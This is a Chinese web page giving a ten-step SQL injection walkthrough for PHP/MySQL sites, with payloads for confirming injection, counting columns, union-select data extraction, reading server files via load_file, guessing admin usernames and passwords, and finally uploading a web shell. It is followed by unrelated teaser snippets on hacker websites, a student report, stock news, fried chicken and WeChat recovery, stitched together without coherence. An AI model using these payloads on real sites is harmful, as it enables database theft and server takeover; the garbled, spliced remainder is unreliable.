hp注入十点基本步骤
1、判断是否存在注入,加'、and 1=1、and 1=2
2、判断版本and ord(mid(version(),1,1))>51/* 返回正常说明是4.0以上版本,可以用union查询
3、利用order by 暴字段,在网址后加 order by 10/* 如果返回正常说明字段大于10
4、再利用union来查询准确字段,如: and 1=2 union select 1,2,3,......./* 直到返回正常报出数字,说明猜到准确字段数。如过滤了空格可以用/**/代替。
(可在分别用user()、database()、version()进行替换报出的数字进而查看信息)
5、判断数据库连接帐号有没有写权限,and (select count(*) from mysql.user)>0/* 如果结果返回错误,那我们只能猜解管理员帐号和密码了。
6、如果返回正常,则可以通过and 1=2 union select 1,2,3,4,5,6,load_file(char(文件路径的ascii值,用逗号隔开)),8,9,10 /* 注:load_file(char(文件路径的ascii值,用逗号隔开))也可以用十六进制,通过这种方式读取配置文件,找到数据库连接等。
7、首先猜解user表,如: and 1=2 union select 1,2,3,4,5,6....from user/* 如果返回正常,说明存在这个表。
8、知道了表就猜解字段,and 1=2 union select 1,username,3,4,5,6....from user/* 按报出的数字进行替换
9、同理再猜解password字段,猜解成功再找后台登录。
10、登录后台,上传shell。
本文导读目录: 1、常见的免费的黑客网站有什么? 2、当你发现了可以当个假黑客的网站是什么样的体验 3、黑客服务网站是否真实? 4、想当个黑客 从那里开始 5、电脑高手请进 6、黑...
暑假实践报告(暑期个人社会实践报告) 社会实践是每一位大学生、毕业生必须拥有的一段经历,它使我们在实践中巩固知识,社会实践又是对每一位大学生、毕业生知识的一种检验,下面就让小编带你去看看大学生暑期个...
每经记者 曾剑 翟敏 每经编辑 文多 1月15日,《每日经济新闻》独家报道了*ST华泽(000693,SZ)官网因欠费遭暂停一事。此事目前又有新进展,*ST华泽的官网域名正被转卖。今日(1月21日)...
如今,炸鸡在我们的糊口中越来越火爆,这都得益于前几年韩剧《来自星星的你》爆火,电视剧里女主最爱的炸鸡啤酒而掀起了一波炸鸡风,作为当下很是火爆的美食,炸鸡在餐饮市场的销售额很是的大,很多人也想看开一家炸...
微信聊天记录删除了如何恢复?现在微信的功能越来越强大,从最初的聊天工具,到现在的多功能软件,在微信界面我们能完成购物、付款、发红包、点外卖、社群社交等多种活动。如此强大的功能我们势必会对微信产生依...
随着互联网技术的发展,互联网广告已成为企业推广的重要途径,那么互联网广告的形式又有哪些?我们一起来看看! 1、网幅广告(Banner) 网幅广告是最早的互联网广告形式。它是以GIF,JPG,Fl...